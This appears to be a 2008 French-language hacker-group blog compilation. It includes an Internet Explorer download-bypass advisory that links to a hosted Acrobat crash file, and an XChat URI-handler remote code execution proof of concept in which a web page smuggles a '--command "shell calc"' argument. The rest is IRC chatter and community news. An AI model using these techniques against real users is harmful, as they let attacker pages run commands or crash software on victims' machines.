#################################################################################################
# Product : IE ALL (windows)
# Bug : Download/File Security Bypass
# From : Remote
#
# If you create an empty file called test.exe in your /www/ folder when you get it via IE , FF , Opera , etc, you'll
# get prompted for download/execute the file, right.
#
# But if we put inside our .exe , some html like a simple :
# <html>
# <head><title>bou!</title></head>
# <body>
# <script>window.print()</script>
# </body>
# </html>
#
# What happens ?
# Firefox ,Opera still ask for download the .exe, but IE * execute this html =)
#
# Another exemple :
# If we put instead of the html code , some header like the pdf one :
# %PDF-1.4
#
# What happens ?
# IE says "Internet Explorer can not display this Web page"
#
# But in reality , our file got downloaded & adobe was launched "silently" (just have a look in TaskManager)
# To prove my point you can try this file with IE * (acrobat reader * should crash) : http://209.190.122.178/HI2.exe
# This file is a DoS that i've discoverered in acrobat reader renamed with an exe extension, the advisory is located here : http://milw0rm.com/exploits/5687
#
# So what's going on ?
#
# Let's try the pdf thing:

GET /HI2.exe HTTP/1.0
Host: Whatever.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob) // Internet Explorer use Mozilla/***(compatible; MSIE, for understanding what is made for Netscape...
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shock
wave-flash, */*
Accept-Language: fr-ca
Connection: Keep-Alive


Response Header:
HTTP/1.1 200 OK
Date: Fri, 20 Jun 2008 15:29:25 GMT
Server: Apache
Last-Modified: Thu, 19 Jun 2008 20:46:16 GMT
ETag: "a010c-2db3b-4500b118a9600"
Accept-Ranges: bytes
Content-Length: 187195
Keep-Alive: timeout=10, max=75
Connection: Keep-Alive
Content-Type: application/x-msdownload


# Now let's see the print one:

GET /print.exe HTTP/1.0
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shock
wave-flash, */*
Accept-Language: fr-ca
Connection: Keep-Alive


Response Header:

HTTP/1.1 200 OK
Date: Fri, 20 Jun 2008 15:32:10 GMT
Server: Apache
Last-Modified: Wed, 18 Jun 2008 17:51:19 GMT
ETag: "a010a-63-44ff48207b3c0"
Accept-Ranges: bytes
Content-Length: 99
Keep-Alive: timeout=10, max=75
Connection: Keep-Alive
Content-Type: application/x-msdownload


# Let's do a test :
<?php
header('Content-type: application/x-msdownload');
header('Content-Disposition: attachment; filename="print.exe"');
readfile('print.exe');
?>
# Working as it should, you will get prompted for a download on all browsers
<?php
header('Content-type: application/x-msdownload');
readfile('HI2.exe');
?>
# Firefox & Netscape ask for download file.php, Opera ask for download file.exe, and IE show the content of file.exe.
# So if no Content-Disposition: is supplied with the Content-Type:application/x-msdownload ,IE try to read the file,
# unless to check the extension, and prompt ANYWAYS for download/execute.
#
# But wait a minute, there's a funny bug here ( http://milw0rm.com/exploits/641 ):
# http://site.com/123456.exe?12345.log //notepad is launched with the content of the 123456.exe (you need a real executable btw .)
# This still unpatched on IE * , i guess this advisory explain the whole fuck
# So what can we do with this ? we can easly pown urlmon.dll, but this is another advisory that will be related to this one :]
#
#
# So let's think ,Microsoft suggest that safari users, should remove them browser, because of the unsecure file download policy.
# ( http://www.microsoft.com/technet/securi ... 53818.mspx , http://cve.mitre.org/cgi-bin/cvename.cg ... -2007-4424 )
#
# Then i guess i should suggest to IE's users to use Firefox as a default browser, untill Microsoft stops them strategic marketing propaganda
# and then review their software specially designed to get powned since 1995 a.k.a IE 1.0
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"

Reference on IE6:
http://support.microsoft.com/kb/329661/en-us/

Il semblerait que le hosting pour "quebec hacking force" (nos joyeux script kiddies hax0rs du style rectumcrew next gen) ait dropper leur forum :

Warning Onlineguardian a banni " quebechackingforce.forum-actif.net " hébergé sur le service forumactif.com pour cause de non respect des conditions générales d’utilisation.
Les raisons possibles de suppression sont les suivantes :

* Contenu violent ou repoussant
* Contenu violent ou incitant à la haine
* Contenu diffamant et/ou atteinte à l’intégrité d’une personne
* Contenu à caractère sexuel et/ou pornographique
* Actes dangereux et pernicieux
* Violation des droits d’auteurs
* Spam
* Pages de phishing et/ou malware
* Fraude à la carte bancaire
* Piratage / hacking


Source : http://www.onlineguardian.net/results.p ... -actif.net

Deceptimus & Botrax nous font le premier segment en Anglais avec une perspective de l'Oklahoma! Les drogues dans l'eau potable poussent les amaricains à faire des appels sur la radio pour tuer les activistes anti-guerre, mais les vols de banques augmentent à la place.

http://www.botcast.net/shows/2008/BotCa ... rround.mp3

Content: Rafale #9 out : http://www.rafale.org/

au somaire

-------------------------------------------------------------------------
9.00 - Sommaire & Introduction & Disclaimer ---- Rafale
9.01 - In Your Street, Volume 1 ---- taskforce
9.02 - Soirée avec AlloPass ---- taskforce
9.03 - Protalk Plus - Alarm Reporting Unit ---- taskforce
9.04 - Mot de la fin ---- Rafale


Il sagit en gros d'un hommage postume a taskforce. Si un des membres de Rafale lit se blog (Comme si le contaire pouvait etre possible ;) ). On aimerait bien savoir si y va avoir d'autre ezine (donc laissez nous un message ;) ).

Il y a quelque mois je postais un article sur un bug affectant le url handler de mirc. Et bien il semblerais que le meme bug soit possible avec xchat, voici ce que nous avons pu receuillir en sniffant les echo de l'underground francophone.

Greetz to securfrog

##################################################################################################################
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI Handler vulnerability but the approch is a bit different.
# We don't use any % or ../../../ as the others related bugs, just a single "
# According to the registry , when the IRCS:// URI is called , the command launched is :
# C:\Program Files\xchat\xchat.exe --existing --url="%1"
#
# The xchat --help option tells us :
# " --command=COMMAND :Send a command to existing xchat "
#
# So we add a simple " at the end of the URL and we're in business ?
# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
#
# Note: The victim needs to be connected to an irc server , and also need IE * .
#
#
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"
#
# Poc: this only launch the calc, sky is the limit passed this point.
<html>
<head><title>Welcome to my personal website</title></head>
<body>
<script>document.location='ircs://blabla@3.3.3.3" --command "shell calc"'</script>
</body>
</html>

<Wyzeman> lautre jour a lepicerie
<Wyzeman> jai decouvert LE DUDE qui mange des chips nature
<Wyzeman> yetais habiller en tonte de gris de la tete au pied
<Wyzeman> yetais peigner comme une photo
<Wyzeman> son look fesais comptable
<Wyzeman> yavais 1 sac de chips nature pi 3 sprite
<Wyzeman> tse c le gars qui aime pas ca le gout :)

Le Recon recidive cette année, du 10 au 15 juin, conférence et trainning se succederons et un party aura lieu le 13 juin.

Commme une discution vaut le nombre de mots qui a dedans ou a peu pret:

<dataworm> Btw on fait un party ouvert a tous
<dataworm> Y'a pas de cover charge http://recon.cx/2008/party.html
* SiDs is now known as SiD
<phawnky> can't make it, paintball le lendemain
<phawnky> avoir eut 300$ je serais aller a la conf, though.
<Wyzeman> c ben chere
<patoff-> c le prix etudiant...
<Wyzeman> et ya un prix underground ?
<Wyzeman> un discount pour le staff de mkd ? :)
<phawnky> hah.. right..
<phawnky> baw pour 3 jours c'est pas chere 300$
<phawnky> et GERA va etre la
<phawnky> haha
<Wyzeman> "c pas chere"...
<Wyzeman> jsais pas
<patoff-> non spa cher
<phawnky> baw les confs sont solide, spa des sell pich.
<patoff-> gera=?
<phawnky> LE gera dude
<Wyzeman> oui c chere :)
<patoff-> une fds a lhotel c ca ca coute donc c pas cher avec les conf inclus
<Wyzeman> pkoi jirais passer une fds a lhotel quand jpeu avoir un plancher gratis chez un ami ? haha
<patoff-> fourrer dans un lit confo chez ton amie
<phawnky> patoff-: le dude de coresecurity.com
<patoff-> ami*
<patoff-> phawnky: k
<phawnky> il avait fait plein de .c pour apprendre comment ecrire des exploits
<phawnky> tk
<phawnky> leet guy
<Wyzeman> on dirais le site de red hat
<phawnky> tk juste pour le diner avec gera ca l'aurait valu le 300$ imho
<Wyzeman> brr
<Wyzeman> ca vaut rien
<Wyzeman> tout squi vont dire la va deprecier plus vite que linflation
<patoff-> parler de rien a une table ... agree
<Wyzeman> so t mieu de garder ton 300$ pour acheter dla soupe won ton
<patoff-> ten a pour lanner!
<Wyzeman> c hot
<phawnky> naw naw naw, c'est un genre de lab
<phawnky> spa juste manger
<Wyzeman> jme rend compte que linformatique est rendu aussi poluer que tout le reste
<phawnky> sinon ca serait gay, eyah.
<phawnky> Wyzeman: dans quel sens? c'est saturé?
<Wyzeman> une conf "underground" a saveur corporative, dans une hotel upper, avec des "Vedettes"
<Wyzeman> non
<Wyzeman> dans le sens que c rendu hollywood like
<Wyzeman> le monde vont au conf pour 2 raisons, rester sur la coche pi se petter les bretelles,
<Wyzeman> tk
<Wyzeman> jmen va me coucher
<Wyzeman> jen aurais plus long a dire mais jpense pas que ca va donner grand chose
<patoff-> comme tout squi ce dit sur irc
<phawnky> Wyzeman: baw le crimfest etait pire.
<phawnky> Wyzeman: et leur confs s'etait tellement un osti de perte de temps.
<patoff-> le crim cetait dla chiasse de compagnie et rien de technique
<patoff-> ca se compare pas du tout
<phawnky> yeah
<phawnky> ca c'etais une conf a saveur corporative
<mulder> bon matin
<phawnky> avec des hollywood stars (le dude chauve de musique plus et LastCall_)
<phawnky> rien a voir avec recon

Yvanlefou est le premier sur la nouvelle (c'est qu'Il est bien ploggé le ivan). Il nous parle sur sont blog d'un soit disant nouveau concept underground adapter au monde du Web 2.0 offrant au personalité underground différente d'unifier leur opinion sur un blog commun (a peu pret comme on a décidé de faire voici déja 2 mois de ca).

On vous invites donc a y participé puisque anyway on va les passez au reader didgest eux aussi au meme titre que les autres ;)

ce nouveau site porte le nom de nibbles microblog (heu ok..)

Si vous etes soit lazy et/ou bien organisé voici dirrectement leurs feed rss

On leurs souhaite une longue et prospere vie dont on pourra bénéficié.



ps: si vous vous demandez pourquoi Ivan est si vite sur la nouvelle cest qu'il s'agit "d'un des" ou "de l'" admin"s" ;)

Bien que nous ayons arretez de publier des ezines, nous n'avons pas par le fait arretez de publier des articles, cependant cette fois ci, on va juste vous passez au moin les pas pires ;).

Les articles publier paraitrons sur le blog sous la categorie "one hit papers".


plus sa change... ;)

vous pouvez faire parvenir vos articles a laddresse suivante : wyzeman at mindkind dot org

Comme vous avez pu le remarquer dans la colonne de droite sous "Bookmark", nous avons maintenant un système de bookmark collectif.

Nous avons utilisé del.icio.us pour un paquet de raison, dont les feeds JSON qui remplissent la boite de droite.

Si vous êtes le moindrement observateur, vous allez remarquer que les tags matchent avec le wiki. En fait, un lien qui se retrouve classifié correctement dans nos bookmarks se retrouve aussi dans le wiki. Pour l'instant les premiers liens ajouter sont majoritairement à cause que nous avons entrer du stock y correspondant sur le wiki.

vous pouvez aussi regarder le tout directement sur del.icio.us pour profiter de leur interface.

Pour ceux qui ont envie de participer, vous pouvez vous créer un compte del.icio.us et soumettre des liens avec for:mindkind dans vos tags. Si vous êtes privilégié et que vous savez comment nous trouver sur IRC, vous pouvez aussi demander accès à notre GUI hyper facile qui ne nécessite aucun compte sur del.icio.us thanks to l'api de del.icio et de la classe PhpDelicious.

En passant pour ceux qui ont pas compris, del.icio.us ca se lit "delicious".. drôle hein?